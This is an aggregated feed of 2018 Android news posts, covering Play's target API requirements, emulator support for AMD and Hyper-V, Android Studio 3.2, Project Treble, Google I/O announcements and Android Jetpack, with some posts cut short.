Category: Android

The Best and Safest Phones for Kids of All Ages | Avast

Charlotte Empey August 2, 2018 Android, iOS, Mobile Security

Some kids take their first steps into the digital world at the tender age of one, when they discover Elmo apps on the family iPad. By the time we give them their first cell phones, they’re already familiar with the web, basic internet etiquette, and the way mobile devices work — let’s face it, they’re a savvy generation.

Start your day on a high note with musical alarms on the Google Clock app

The Keyword July 31, 2018 Android

Starting today, you’ll be able to wake up to your favorite music on Spotify with the Google Clock app. Swap out the classic alarm sounds for your favorite pump-up song, a calming soundtrack or a mood-boosting melody.

To get started with musical alarms, make sure the latest versions of your Spotify and Clock apps are installed and connected on your device—this works for both Free and Premium Spotify users. Then choose your perfect wake up music. You can browse recently played music, choose from Spotify’s curated morning playlists, or search for a specific soundtrack.

clock app

Now when your musical alarm goes off, it will be a whole lot easier to get moving. After switching off your alarm, you’ll have the option to continue listening to Spotify throughout your day.

This feature will be rolling out globally this week on the Play Store, and will be available on all devices running Android 5.0 (Lollipop) and above.

Updating your games for modern Android

Android Developers July 20, 2018 Android, Android Studio, Google Play, Requirements

Posted by Tom Greenaway, Senior Partner Developer Advocate

Last year we announced that starting from August 2018 Google Play will require all new apps and games to target a recent Android API level – set to API level 26 (Android 8.0 Oreo), or higher. Additionally, this requirement will extend to updates for existing apps and games starting from November 2018.

Every new Android version introduces changes that bring significant security and performance improvements – and enhance the user experience of Android overall. Updating your games to target the latest API level ensures that your users can benefit from these improvements, while still allowing your games to run on older Android versions.

Simple next steps:

  • Install the Android 8.0 Oreo SDK (API level 26) via Android Studio by navigating to (Tools > Android > SDK Manager > Android SDK > SDK Platforms).
  • Update your game to target API level 26 and see whether your game has any incompatibilities or issues as soon as possible. Update any external dependencies as necessary. Learn more about the incremental changes between versions of Android here.
  • If you are using an advertising network, SDK or plugin which is incompatible with API level 26, reach out to your contacts and find out their timeline for supporting target API level 26. The sooner they’re aware of these changes the better.
  • If you build your game with Unity, support for target API 26 is built into Unity 5.6.6 and beyond. Simply ensure the latest target API level is selected in your Android build settings for Unity (Build Settings > Android > Player Settings). For versions of Unity 5.6.5 and prior, consult this documentation which includes a workaround for versions dating back to 4.3.
  • For games built with Unreal, check your Android platform settings has the “Target SDK Version” set to 26.
  • If you use Cocos2D-X, check the target API level in the gradle.properties file that is generated.

Significant changes to be aware of:

  • Since API 23, we have required permissions be requested at runtime which helps streamline the app install process.
  • Since API 24, apps can no longer dynamically link against non-NDK libraries. If your app (including third-party static libraries) contains native code, you should only be using public NDK APIs.
  • If your game uses Android push notifications, the Google Play Services SDK in your game will need to be updated to version 10.2.1 or above for your game to support API level 26.
  • If your game uses opaque binary blobs (OBB), then your game must check if it can access the directory before attempting to access the OBB files themselves. We recommend explicitly requesting permission for access using the Runtime Permissions API, and gracefully handling cases wherein the permission is not granted. Additionally, add an entry in the manifest for the external storage access:
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    

Moving ahead

Remember, updating the target API level is just the first step – make sure your game is compatible with the behavior changes between your current target API level and API level 26. Check out further guidance on the changes in past versions of Android to help in your migration process. These policy changes are important for moving the Android ecosystem forward and keeping it healthy for our users – and yours.

How useful did you find this blog post?

Android has created more choice, not less

The Keyword July 18, 2018 Android, Public Policy

If you buy an Android phone, you’re choosing one of the world’s two most popular mobile platforms—one that has expanded the choice of phones available around the world.

Today, the European Commission issued a competition decision against Android, and its business model. The decision ignores the fact that Android phones compete with iOS phones, something that 89 percent of respondents to the Commission’s own market survey confirmed. It also misses just how much choice Android provides to thousands of phone makers and mobile network operators who build and sell Android devices; to millions of app developers around the world who have built their businesses with Android; and billions of consumers who can now afford and use cutting-edge Android smartphones.  

Today, because of Android, there are more than 24,000 devices, at every price point, from more than 1,300 different brands, including Dutch, Finnish, French, German, Hungarian, Italian, Latvian, Polish, Romanian, Spanish and Swedish phone makers.

android provides choice

The phones made by these companies are all different, but have one thing in common—the ability to run the same applications. This is possible thanks to simple rules that ensure technical compatibility, no matter what the size or shape of the device. No phone maker is even obliged to sign up to these rules—they can use or modify Android in any way they want, just as Amazon has done with its Fire tablets and TV sticks.

To be successful, open-source platforms have to painstakingly balance the needs of everyone that uses them. History shows that without rules around baseline compatibility, open-source platforms fragment, which hurts users, developers and phone makers. Android’s compatibility rules avoid this, and help make it an attractive long-term proposition for everyone.

Creating flexibility, choice and opportunity

Today, because of Android, a typical phone comes preloaded with as many as 40 apps from multiple developers, not just the company you bought the phone from. If you prefer other apps—or browsers, or search engines—to the preloaded ones, you can easily disable or delete them, and choose other apps instead, including apps made by some of the 1.6 million Europeans who make a living as app developers.

Removing and replacing preloaded apps

In fact, a typical Android phone user will install around 50 apps themselves. Last year, over 94 billion apps were downloaded globally from our Play app store; browsers such as Opera Mini and Firefox have been downloaded more than 100 million times, UC Browser more than 500 million times.

This is in stark contrast to how things used to be in the 1990s and early 2000s—the dial-up age. Back then, changing the pre-installed applications on your computer, or adding new ones, was technically difficult and time-consuming. The Commission’s Android decision ignores the new breadth of choice and clear evidence about how people use their phones today.

A platform built for the smartphone era

In 2007, we chose to offer Android to phone makers and mobile network operators for free. Of course, there are costs involved in building Android, and Google has invested billions of dollars over the last decade to make Android what it is today.  This investment makes sense for us because we can offer phone makers the option of pre-loading a suite of popular Google apps (such as Search, Chrome, Play, Maps and Gmail), some of which generate revenue for us, and all of which help ensure the phone ‘just works’, right out of the box. Phone makers don’t have to include our services; and they’re also free to pre-install competing apps alongside ours. This means that we earn revenue only if our apps are installed, and if people choose to use our apps instead of the rival apps.

Good for partners, good for consumers

The free distribution of the Android platform, and of Google’s suite of applications, is not only efficient for phone makers and operators—it’s of huge benefit for developers and consumers. If phone makers and mobile network operators couldn’t include our apps on their wide range of devices, it would upset the balance of the Android ecosystem. So far, the Android business model has meant that we haven’t had to charge phone makers for our technology, or depend on a tightly controlled distribution model.  

We’ve always agreed that with size comes responsibility. A healthy, thriving Android ecosystem is in everyone’s interest, and we’ve shown we’re willing to make changes. But we are concerned that today’s decision will upset the careful balance that we have struck with Android, and that it sends a troubling signal in favor of proprietary systems over open platforms.  

Rapid innovation, wide choice, and falling prices are classic hallmarks of robust competition and Android has enabled all of them. Today’s decision rejects the business model that supports Android, which has created more choice for everyone, not less. We intend to appeal. 

#AndroidWorks

Android Emulator – AMD Processor & Hyper-V Support

Android Developers July 9, 2018 AMD, Android, Android Emulator, Android Studio, HyperV

Posted by Jamal Eason, Product Manager, Android

Since the major revamp of the Android Emulator two years ago, we have focused on delivering a fast and feature-rich emulator to help you build great app experiences for users. Today, the Android Emulator is the top device deployed to from Android Studio — more than 2x over physical Android devices. We are humbled to hear from many of you that the Android Emulator has come a long way, but we are not done yet.

Making the Android Emulator faster is one of the top priorities for the Android Studio team. Over the last few releases, we have launched quick boot & emulator snapshots for quickly starting and resuming emulator sessions in under 2 seconds. Up until now, our emulator experience has almost universally worked on macOS® and Linux computers. But for users of Microsoft® Windows® or the Microsoft® Hyper-V platform, our hardware accelerated speed enhancements for the Android Emulator only worked with computers with Intel® processors. Support for AMD® processors and Microsoft Hyper-V hypervisor are two long-standing user requests from the Android developer community that we are happy to address with this Android Emulator update.

Today, you can download the latest Android Emulator release, which is enabled to run x86 based Android Virtual Devices (AVD) on computers that use AMD processors. This exciting update makes the Android Emulator more accessible to a new set of Android app developers that were previously limited to software emulation, but can now have hardware accelerated performance. Moreover, for those of you who use Hyper-V to run your local app backend, the Android Emulator can now also coexist with other Hyper-V-backed applications on Windows® 10.

Thanks to a new Microsoft Windows Hypervisor Platform (WHPX) API and recent open-source contributions from Microsoft, even more Android app developers can take advantage of all the speed improvements and features in the Android Emulator.

Android Emulator running on Windows 10 with AMD Processor
Screenshot Configuration: Asus ROG Strix GL 702ZC, Processor: AMD® Ryzen 7 1700 Processor, Chipset: AMD 5350, Graphics: AMD® Radeon RX580

Support for these technologies was initially available in the v27.3.8 Android Emulator canary release and today we are releasing this set of preview features (AMD processor & Hyper-V support) on the stable channel for more feedback. Alongside this update, we have added additional speed improvements in loading emulator snapshots for those developers using the Intel® Hardware Accelerated Execution Manager (HAXM).

How to use

Linux

If you use Linux for Android app development, the Android Emulator will continue to use the native Kernel-based Virtual Machine (KVM) hypervisor for both Intel and AMD based computers for a fast and performant virtualization solution. An update to the v27.3.8 Android Emulator will offer you the new snapshots UI along with improvements to performance, reliability and resource usage.

macOS

For OS X v10.10 Yosemite and higher, the Android Emulator uses the built-in Hypervisor.Framework by default, and falls back to using the Intel Hardware Accelerated Execution Manager (HAXM) if Hypervisor.Framework fails to initialize (such as when running on OS X v10.9 or earlier). Once you update to the latest Android Emulator on macOS, you will also have access to the new snapshots UI along with under the hood performance and reliability improvements.

Android Emulator – Snapshots Extended Controls

Microsoft Windows

On Intel x86-based computers, the Android Emulator will continue to use Intel HAXM by default. Intel HAXM is a mature and open-sourced hypervisor solution developed by Intel. Thanks to on-going development by Intel, the fastest emulator performance on Windows is still with Intel HAXM. To download the latest Intel HAXM v7.2.0, check for updates in the Android SDK Manager.

If you have an AMD processor in your computer you need the following setup requirements to be in place:

  • AMD Processor – Recommended: AMD® Ryzen processors
  • Android Studio 3.2 Beta or higher – download via Android Studio Preview page
  • Android Emulator v27.3.8+ – download via Android Studio SDK Manager
  • x86 Android Virtual Device (AVD) – Create AVD
  • Windows 10 with April 2018 Update
  • Enable via Windows Features: “Windows Hypervisor Platform”

Windows Hypervisor Platform setting in Windows 10

If you want to use Hyper-V at the same time as the Android Emulator on your Intel processor-based computer, you will also need the same Android Studio and Android Emulator versions as listed above, but with the additional requirements:

  • Enable via Windows Features: “Hyper-V” – Only available for Windows 10 Professional/Education/Enterprise
  • Intel Processor : Intel® Core processor that supports Virtualization Technology (VT-x), Extended Page Tables (EPT), and Unrestricted Guest (UG) features. Additionally VT-x needs to be enabled in the BIOS.

For more setup tips and troubleshooting details, check out the documentation page.

Again, for existing Windows users who have an Intel-based processor, the Android Emulator will continue to use the faster and recommended Intel HAXM configuration. For those using AMD processors, and those who use Hyper-V hypervisors, this should be an exciting step forward to start using the Android Emulator.

Next Steps & Feedback

Download the latest Android Emulator from the Android Studio 3.2 Beta SDK Manager for the latest performance updates across all supported platforms that you are using. We are going to continue to invest in performance improvements for each of the platforms and we look forward to your feedback and feature requests.

If you find a bug or issue, feel free to file an issue. Connect with us — the Android Studio development team ‐ on our Google+ page or on Twitter.

Android Studio 3.2 Beta

Android Developers June 21, 2018 Android, Android Studio

Posted by Jamal Eason, Product Manager, Android

Starting today, you can download Android Studio 3.2 Beta. Previewed at Google I/O 2018, the latest release of the official Android IDE is focused on helping onboard you to all the new features launched around Google I/O — Android JetPack, Android P Developer Preview, and the new Android App Bundle format. There are also several other exciting new features included in Android Studio 3.2 to accelerate your app development, such as Emulator Snapshots and the Energy Profiler.

As the usage of Android Studio has grown in the 3.5 years since version 1.0, we have also become increasingly obsessed with quality. We continue to invest in quality because we know that millions of app developers spend almost everyday in Android Studio and need a reliable set of tools. Stability, build times, and other quality work will be the primary focus for our next release once we finish Android Studio 3.2. We also did not want to wait, so we have made checkins to address memory leaks and performance issues as well as fixed more than 450 bugs. Thank you for the continued feedback and please keep it coming so we can focus on the areas you care about most in the next version of Android Studio. If want to try out the latest features, and assess the improvements in quality, you can download Android Studio on the beta release channel.

What is inside of Android Studio 3.2

Building on the canary release of Android Studio 3.2, the Beta release includes:

  • Android App Bundle support – The Android App Bundle is a new publishing format that uses the Google Play’s Dynamic Delivery, which delivers a smaller, optimized APK that only contains the resources needed for a specific device. Without any code changes, you can take advantage of the app size savings of an Android App Bundle by navigating to Build Build Bundle / APK or BuildGenerate Signed Bundle / APK.

Build Android App Bundle

  • Emulator Snapshots – With Android Studio 3.2 you can create snapshots at any emulator state and then start a snapshot in under 2 seconds. You can pre-configure an Android Virtual Device (AVD) snapshot with the apps, data and settings that you want and then repeatedly go back to the same snapshot. Learn more.

Android Emulator Snapshots

  • Energy Profiler – The new Energy Profiler in the performance profiler suite can help you understand the energy impact of your app on an Android device. You can now visualize the estimated energy usage of system components, plus inspect background events that may contribute to battery drain.

Energy Profiler

Check out the full write-up of all the major features organized by development flow listed below and on the canary blog:

Develop

  • Navigation Editor
  • AndroidX Refactoring
  • Sample Data
  • Material Design Update
  • Android Slices
  • CMakeList editing
  • What’s New Assistant
  • New Lint Checks
  • Intellij Platform Update

Build

  • Android App Bundle
  • D8 Desugaring
  • R8 Optimizer

Test

  • Android Emulator Snapshots
  • Screen Record in Android Emulator
  • Virtual Scene Android Emulator Camera
  • ADB Connection Assistant

Optimize

  • Energy Profiler
  • System Trace
  • Profiler Sessions
  • Automatic CPU Recording
  • JNI Reference Tracking

Sessions at Google I/O ’18

With the release of Android Studio 3.2 at Google I/O ’18, the Android Studio team also presented a series of sessions about Android Studio. Watch the following videos to see the latest features in action and to get tips & tricks on how to use Android Studio:

Download & Feedback

Download the latest version of Android Studio 3.2 from the beta channel download page. If you are using a previous versions of Android Studio, make sure you update to Android Studio Beta 1 or higher. If you also want to maintain a stable version of Android Studio, you can run the stable release version and beta release versions of Android Studio at the same time. Learn more.

To use the mentioned Android Emulator features make sure you are running at least Android Emulator v27.3+ downloaded via the Android Studio SDK Manager.

Please note, to ensure we maintain product quality, some of the features you saw in the canary channel like Navigation Editor are not enabled by default. To turn on canary release channel features go to File → Settings → Experimental → Editor → Enable Navigation Editor.

If you find a bug or issue, feel free to file an issue. Connect with us — the Android Studio development team ‐ on our Google+ page or on Twitter.

Project Capillary: End-to-end encryption for push messaging, simplified

Android Developers June 5, 2018 Android, Authentication, encryption, fcm, GCM, push messaging, security

Posted by Giles Hogben, Privacy Engineer and Milinda Perera, Software Engineer

Developers already use HTTPS to communicate with Firebase Cloud Messaging (FCM). The channel between FCM server endpoint and the device is encrypted with SSL over TCP. Ho…

All the (Android) Things at Google I/O

Android Developers May 25, 2018 #io18, Android, Android Things, android things 1.0, I/O 2018

Melissa Daniels, Program Manager for Android Things

Android Things enables you to build and maintain IoT devices at scale. We recently released Android Things 1.0 with long-term support for production devices, so you can easily take an IoT device from prototype to commercial product.

We packed Google I/O this year with Android Things content to inspire and empower the developer community, from talks and codelabs to interactive demos and a scavenger hunt. Here’s a closer look at the fun stuff we had on display that you won’t see on the shelves of retail stores.

Demos

We introduced a handful of new interactive Android Things demos across I/O, showcasing the AI and ML capabilities of the platform, so if you didn’t get an opportunity to attend this year, here’s a few of our favorites– perfect for exploring from wherever you are in the world!

Smart Flowers: Flos Mobilis

What do you get when you combine machine learning, Android Things and robotics? Flos Mobilis, a continuum robot where each flower is backed by an i.MX7D development board and a camera to run an embedded neural net model that controls the motion of the flower. This is all done offline with no data stored or transmitted.

Smart Flowers: Flos Affectus

What if a robot could respond to the way you feel? Flos Affectus is a cluster of robotic flowers that “bloom” and “un-bloom” depending on the expression detected on the user’s face. The 4 broad expressions Flos Affectus is trained to detect are: happy, sad, angry, surprised. Using a camera embedded in the head of the alpha flower, the flower cluster is able to detect the user’s face and infer the facial emotion. The flower cluster runs offline with no data stored or transmitted and demonstrates movement capabilities and on-device machine learning models.

Rosie the Android

Initially designed by a team of Google engineers for the annual Grace Hopper conference, Rosie the Android is a 5 foot selfie-taking Android, complete with machine-learning capabilities. Inspired by Rosie the Riveter, she’s a fully controllable robot that can take photos, respond to commands, wheel around and interact with those around her.

Did you take a selfie with Rosie at I/O? Redeem your unique access code at g.co/rosie

Smart Projector

Smart Projector is built on Lantern, an Android Things project exploring the relationship between surfaces and content — augmenting real-world objects and environments with glanceable, meaningful data. It leverages the Google Experiments project known as Quick Draw, using the world’s largest doodling data set that has been shared publicly to help with machine learning research.

To learn more about Lantern or to start building your own, start here.

3D Printer

This modified Printrbot Smalls 3D Printer uses a real-time subsystem that showcases the flexibility of Android Things– a microcontroller does the low-latency motor control, while Android Things handles OpenGL rendering. By keeping most of the logic on a high-level platform like Android you make development and debugging much easier, thanks to Android’s great tooling.

The future of 3D printing? Making real-time control as easy and portable as the rest of Android Things.

Codelabs

Phew! That was just the tip of the demo iceberg. With so many demos and so many ways to use Android Things, it’s easy to start imagining all the things you can build! At I/O, we helped a lot of developers get started building their first Android Things device using the Android Things Starter Kit. We’re making these codelabs available, so you can get to them whenever you need, or build your own.

Videos

Missed the I/O talks? Catch the recordings of each Android Things talk, so you can start, pause, and rewind at your own leisure. Or, just lean back and watch them all.

What’s new in Android Things

Build effective OEM-level apps on Android Things

Build real consumer devices with Android Things

Electronic design for Android Things System on Modules

Women Techmakers panel: experiences developing on Android Things

Product design: how to build better products with Android Things

Device provisioning and authentication with Android Things

Update production devices in the field with the Android Things Console

Start building!

On top of all the resources we just mentioned, we have a corpus of information on our developer documentation, and our new community website where you can see more inspiring projects and even submit your own. So, what are you waiting for? Pick up an Android Things Starter Kit and start building something today!

Faster Adoption with Project Treble

Android Developers May 9, 2018 #io18, Android, android p, Featured, Project Treble

Posted by Iliyan Malchev, Project Treble Architect

Android P Beta available at android.com/beta

As Android continues to evolve, each new release of the OS brings new features, new user experiences, and better security. It is important that these new releases find their way to mobile devices as fast as possible.

Yesterday, we announced that the following devices, in addition to Pixel and Pixel 2, now support Android P Beta: Sony Xperia XZ2, Xiaomi Mi Mix 2S, Nokia 7 Plus, Oppo R15 Pro, Vivo X21, OnePlus 6 and Essential PH‑1. Android P Beta provides an opportunity for developers and early adopters around the world to try the latest Android release, test their apps, and provide feedback.

In this post, we provide an update to Project Treble and the technology that allowed us to bring Android Beta to more phones this year.

Building the Foundation

Bringing the new Android release quickly to the hands of users takes a combined effort between Google, silicon manufacturers (SM), device manufacturers (OEMs), and carriers. This process is technically challenging and requires aligning the schedules between our industry partners.

To reduce the technical difficulties, we launched Project Treble as part of Android Oreo.

The Silicon Manufacturers

Next, to capitalize on the foundation we built, we collaborated closely with the silicon manufacturers, where the journey of making an Android device always begins.

Any device with the latest version of Android must be based on an SoC with the proper software support for it. This software, commonly referred to as the Board Support Package (BSP), contains not only the chip-specific vendor implementation, but also all of the Android Open Source Project (AOSP) and pieces of the framework that are missing from AOSP itself (e.g., carrier-specific telephony functionality).

The life cycle of an Android Dessert release passes through Silicon Manufacturer Partners, Device Makers and Carriers, until it gets to the hands of the end-users.

These BSPs are the starting point for all device launches. OEMs adapt the vendor implementation to their hardware and add their own custom framework components.

While silicon manufacturers always want the latest version of Android in their BSPs, the costs have been prohibitive. By making it possible for newer AOSP frameworks to run on older, already-released vendor implementations, Project Treble dramatically reduces the need for continuous investment in older silicon to support each Android release. Silicon manufacturers have to do all this work just once, rather than every time there is a new release of Android.

Solving the Timing Problem

However, that first time still has to happen. Below is a chart, which illustrates the effort the various actors expend over time as they go through each release. You can think of it as code churn or bug count over time.

Overlapping timelines and efforts for dessert adoption among Android, Chip Support and OEMs increase the overall effort to get the Android release out.

The chart shows how there is very little time in the year for Google, silicon manufacturers, and the OEMs to all this work. Any overlap between phases causes code churn and introduces significant schedule risk. For OEMs who target the holiday season, it is often safer to launch on an older BSP with a year-old or even older Android version. This dynamic has been at the heart of the slow uptake of the latest Android release, even on flagship devices.

Qualcomm, Samsung and MediaTek co-develop their BSP with Android.

To solve this, we’ve worked closely with Qualcomm, MediaTek and Samsung SLSI to co-develop their BSPs, starting with Android P. Their BSPs are now ready for Android P on a much-accelerated schedule, reducing the overall effort significantly. These silicon manufacturers are now able to provide a stable and high-quality release much earlier than before, allowing OEMs to bring the latest innovations of Android to their customers across the globe.

Devices can launch earlier with Project Treble as the timeline for developing Android and Chipset Support overlaps.

This is an important step in accelerating the adoption of Android releases that bring numerous benefits to our partners, users, and Android developers. We look forward to seeing many more partners launch or upgrade devices to Android P.

Google I/O 2018: What’s new in Android

Android Developers May 8, 2018 Android, Featured, GooglePlay, Jetpack, Kotlin


Posted By Stephanie Cuthbertson, Product Management Director, Android

As Android has grown exponentially over the past ten years, we’ve also seen our developer community grow dramatically. In countries like China, India, and Brazil, the number of developers using our IDE almost tripled – in just two years. With such growth, we feel an even greater responsibility to invest in our developer experience. Guided by your feedback, we’ve focused our efforts on making mobile development fast and easy, helping you get more users by making apps radically smaller, and increasing engagement to keep users coming back. We’re also pretty excited to see Android Things go to 1.0, creating new opportunities for you to develop – everything from major consumer devices, to cool remote control vehicles! As Day 1 of Google I/O kicks off, let’s take a closer look at these major themes from the Developer Keynote:

Development: making mobile development fast and easy

  • Android Jetpack — Today, we announced Android Jetpack, designed to accelerate your app development. Android Jetpack is the next generation of Android components, bringing together the benefits of the Support Library — backwards compatibility and immediate updates — to a larger set of components, making it quick and easy to build robust, high quality apps. Android Jetpack manages activities like background tasks, navigation, and lifecycle management, so you can eliminate boilerplate code and focus on what makes your app great. Android Jetpack is designed to work well with Kotlin, saving you even more code with Android KTX. The new Android Jetpack components released today include WorkManager, Paging, Navigation, and Slices.

  • Kotlin — Since announcing support for Kotlin last year, the developer community has embraced the language. Most importantly, 95% of developers tell us they are very happy with using Kotlin for their Android development. And, the more developers use it, the more that number rises. The number of Play Store apps using Kotlin grew 6x in the last year. 35% of pro developers use it, and that number is growing each month. We are continuing to improve the Kotlin developer experience across our libraries, tooling, runtime, documentation and training. Android KTX is launching today as part of Android Jetpack to optimize the Kotlin developer experience. Tooling continues to improve with Android Studio, Lint support, and R8 optimizations. We have even tuned the Android Runtime (ART) in Android P, so that apps built with Kotlin can run faster. We have rolled out Kotlin code snippets in our official documentation, and are publishing a Kotlin version of the API reference documentation today. Earlier this week, we launched a new Kotlin Bootcamp on Udacity, which is a great resource for developers who are new to Kotlin. Lastly, we now have a Kotlin specialization in the Google Developers Experts Program. If you still haven’t used Kotlin, I hope you you give it a try.
  • Android Studio 3.2 CanaryAndroid Studio 3.2 features tools for Android Jetpack including a visual Navigation Editor and new code refactoring tools. The canary release also includes build tools to create the new Android App Bundle format, Snapshots in the Android Emulator for fast start time, new R8 optimizer for smaller download and install app code size, a new Energy Profiler to measure app impact on battery life, and more. You can download the latest version of Android Studio 3.2 from the canary channel download page.

Distribution: making apps radically smaller

Introducing Android App Bundle.

  • Android App Bundle & Google Play Dynamic Delivery — Introducing the new app model for Android. Dramatically reduce app size with a new publishing format—the Android App Bundle. In Android Studio, you’ll now build an app bundle that contains everything your app needs for any device—all the languages, every device screen size, every hardware architecture. Then, when a user downloads your app, Google Play’s new Dynamic Delivery will only deliver the code and resources matching the user’s device. People see a smaller install size on the Play Store, can download your app more quickly, and save space on their devices. An example of all resources being delivered to a device via a legacy APK and an example of Dynamic Delivery serving just what’s needed to a device.
    (Left) An example of all resources being delivered to a device via a legacy APK.
    (Right) An example of Dynamic Delivery serving just what’s needed to a device.
  • Dynamic features via the Android App Bundle — The Android App Bundle also enables modularization so that you can deliver features on-demand, instead of during install. You can build dynamic feature modules in the latest Android Studio canary release. Join our beta program to publish them on Google Play.
  • Google Play Console — New features and reports in the Play Console will help you improve your app’s performance and grow your business. Read about the improvements to the dashboard, statistics, Android vitals, pre-launch report, acquisition report, and subscriptions dashboard. You can also upload, test, and publish apps using our new publishing format, the Android App Bundle.
  • Google Play Instant — After launching in beta at GDC, today we announced that all game developers can build instant apps and we’re thrilled to welcome Candy Crush Saga. Google Play Instant is now available on over 1 billion devices worldwide from the Play Store, search, social and most places you can tap a link. To make instant apps easier to build, we are launching a Unity plugin and beta integration with Cocos creator this week. Recently, we’ve started testing Google Play Instant compatibility with AdWords, allowing people to try out games directly from ads, across all the channels reached by Universal App campaigns.

Engagement: bringing users back more and more.

  • Slices Slices are UI templates that display a rich array of dynamic, and interactive content from your app, across Android and within Google surfaces. Slices can include live-data, scrolling content, inline actions, and deep-linking into your app so users can do everything from playing music to checking reservation updates. Slices can also contain interactive controls like toggles and sliders. You can get started building Slices today, and they will begin appearing for users soon.
Check reservations with Slices.Control music with Slices.Call a Lyft using Slices.
  • Actions — Actions are a new way to make your app’s capabilities and content more accessible, so that people can easily get to it at the right moment. App Actions will appear to users based on usage and relevance, across multiple Google and Android surfaces, such as the Google Search App, the Play Store, the Google Assistant, and the Launcher. App Actions will be available for all developers to try soon, please sign up here if you’d like to be notified. You can also choose to build a Conversational Action as a companion experience to your app. This works on a variety of Assistant-enabled devices, such as speakers and smart displays. Both types of Actions use a new common catalog of intents.

Actions are a new way to make your app's capabilities and content more accessible, so that people can easily get to it at the right moment.

Smarter devices: a powerful platform for IoT devices

  • Android Things 1.0 Android Things is Google’s managed OS that enables developers to build and maintain Internet of Things devices at scale. Earlier this year at CES, we announced Lenovo, Harman, LG, and iHome are all building Assistant-enabled products powered by Android Things. Introducing Android Things 1.0! After a developer preview with over 100,000 SDK downloads and feedback from more than 10,000 developers, we announced Android Things 1.0 this week. Four new System-on-Modules (SoMs) are now supported on the platform with guaranteed long-term support for three years and additional options for extended support, making it easier to go from prototypes to production. To make product development more seamless than ever, the accompanying Android Things Console is also ready for production. It helps developers easily manage and update their devices with the latest stability fixes and security updates provided by Google.

To get started with Android Things, visit our developer site and the new Community Hub to explore kits, sample code, community projects, and join Google’s IoT Developers Community to stay updated. We introduced a limited program to partner with the Android Things team for technical guidance and support building your product. If your company is interested, sign up for our OEM Partner Program.
In addition to all these new developments, we’re on the ground in over 140 countries, growing and expanding the developer community through programs such as Women Techmakers and Google Developer Groups (GDGs). We’re investing in training programs like Google Developers Certification, building more courses through Udacity and other partners, to help developers deepen their technical capability. Today, 225 Google Developers Agency Program members from 50 agencies in 15 countries, are Android Certified. As part of our Google Developers Experts Program, we also now have more than 90 Android Developer Experts around the world actively supporting developers, start-ups and companies to build and launch innovative apps.
We also continue to recognize the great work from top app and game developers. This year, we held our third annual Google Play Awards. The nominees represent some of the best experiences available on Android, with an emphasis on overall quality, strong design, technical performance, and innovation. Check out the winners and nominees.
During Google I/O, attendees and viewers have an opportunity to dive deep with 48 Android & Play breakout sessions. Thank you for all your wonderful feedback, and please keep giving us your advice on where we should go next.

Use Android Jetpack to Accelerate Your App Development

Android Developers May 8, 2018 Android, androidjetpack, Featured, Jetpack

Posted by Chris Sells, Benjamin Poiesz, Karen Ng, Product Management, Android Developer Tools

Today we’re excited to introduce Android Jetpack, the next generation of components, tools and architectural guidance to accelerate your Android app development.

Android Jetpack was inspired by the Support Library, a set of components to make it easy to take advantage of new Android features while maintaining backwards compatibility; it’s currently used by 99% of every app in the Play Store. Following on that success, we introduced the Architecture Components, designed to make it easier to deal with data in the face of changes and the complications of the app lifecycle. Since we introduced those components at I/O just one year ago, an overwhelming number of you have adopted them. Companies such as LinkedIn, Zillow and iHeartRadio are seeing fewer bugs, higher testability and more time to focus on what makes their app unique.

The Android developer community has been clear — not only do you like what we’ve done with these existing components, but we know that you want more! And so more is what you get.

What is Android Jetpack?

Android Jetpack is a set of components, tools and guidance to make great Android apps. The Android Jetpack components bring together the existing Support Library and Architecture Components and arranges them into four categories:

Android Jetpack components are provided as “unbundled” libraries that are not part of the underlying Android platform. This means that you can adopt each component at your own speed, at your own time. When new Android Jetpack functionality is available, you can add it to your app, deploy your app to the Play Store and give users the new features all in a single day (if you’re quick)! The unbundled Android Jetpack libraries have all been moved into the new androidx.* namespace (as described in detail in this post).

In addition, your app can run on various versions of the platform because Android Jetpack components are built to provide their functionality independent of any specific version, providing backwards compatibility.

Further, Android Jetpack is built around modern design practices like separation of concerns and testability as well as productivity features like Kotlin integration. This makes it far easier for you to build robust, high quality apps with less code. While the components of Android Jetpack are built to work together, e.g. lifecycle awareness and live data, you don’t have to use all of them — you can integrate the parts of Android Jetpack that solve your problems while keeping the parts of your app that are already working great.

We know that these benefits are important to you because of feedback like this:

“We had been thinking of trying out MVVM in our code base. Android Architecture Components gave us an easy template to implement it. And it’s helped make our code more testable as well; the ability to unit test ViewModels has definitely increased code robustness.”

— Sumiran Pradhan, Sr. Engineer, Zillow

If you want to learn more about how companies are using Android Jetpack components, you can read the developer stories on the Android Developer site.

And finally, as you can see from the Android Jetpack diagram above, today we’re announcing new components as well.

What’s New

Android Jetpack comes with five new components:

  • WorkManager alpha release
  • Navigation alpha release
  • Paging stable release
  • Slices alpha release
  • Android KTX (Kotlin Extensions) alpha release

WorkManager

The WorkMananager component is a powerful new library that provides a one-stop solution for constraint-based background jobs that need guaranteed execution, replacing the need to use things like jobs or SyncAdapters. WorkManager provides a simplified, modern API, the ability to work on devices with or without Google Play Services, the ability to create graphs of work, and the ability to query the state of your work. Early feedback is very encouraging but we love to make sure that your use cases are covered, too. You can see what we have so far and provide feedback on our alpha on the WorkManager component.

Navigation

While activities are the system provided entry points into your app’s UI, their inflexibility when it comes to sharing data between each other and transitions has made them a less than ideal architecture for constructing your in-app navigation. Today we are introducing the Navigation component as a framework for structuring your in-app UI, with a focus on making a single-Activity app the preferred architecture. With out of the box support for Fragments, you get all of the Architecture Components benefits such as Lifecycle and ViewModel while allowing Navigation to handle the complexity of FragmentTransactions for you. Further, the Navigation component allows you to declare transitions that we handle for you, automatically builds the correct Up and Back behavior, includes full support for deep links, and provides helpers for connecting Navigation into the appropriate UI widgets, like the navigation drawer and bottom navigation. But that’s not all! The Navigation Editor in Android Studio 3.2 allows you to see and manage your navigation properties visually:

The Navigation component is also in alpha and we’d love your feedback.

Paging

Data presented in an app can be large and costly to load, so it’s important to avoid downloading, creating, or presenting too much at once. The Paging component version 1.0.0 makes it easy to load and present large data sets with fast, infinite scrolling in your RecyclerView. It can load paged data from local storage, the network, or both, and lets you define how your content gets loaded. It works out of the box with Room, LiveData, and RxJava.

Slices

And finally, to round out the set of new features making their debut in Android Jetpack is the Slices component. A “slice” is a way to surface your app’s UI inside of the Google Assistant as a result of a search:

You can learn all about the Slices component and how to integrate it into your app on the Android Developer website.

Android KTX

And last but not least, one goal of Android Jetpack takes advantage of Kotlin language features that make you more productive. Android KTX lets you transform Kotlin code like this:

view.viewTreeObserver.addOnPreDrawListener(
  object : ViewTreeObserver.OnPreDrawListener {
    override fun onPreDraw(): Boolean {
